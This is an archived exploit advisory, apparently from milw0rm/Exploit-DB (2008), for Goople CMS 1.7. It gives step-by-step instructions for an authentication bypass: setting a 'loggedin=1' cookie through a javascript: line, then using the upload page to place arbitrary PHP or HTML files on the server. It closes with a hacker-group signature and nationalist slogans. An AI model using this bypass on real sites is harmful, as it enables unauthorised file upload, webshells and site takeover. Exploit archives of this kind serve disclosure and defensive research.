Goople CMS 1.7 - Insecure Cookie Handling

EDB-ID:

7205




Platform:

PHP

Date:

2008-11-23


#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Goople Cms (1.7)
# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
# 
# Exploit : 
# Open : http://SITE/win/upload.php
# javascript:document.cookie = "loggedin=1; path=/";
# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
# File : http://SITE/user/doc/FILE (or your select)
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                       Rinia ShqiptaRe  :) 
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#######################################################

# milw0rm.com [2008-11-23]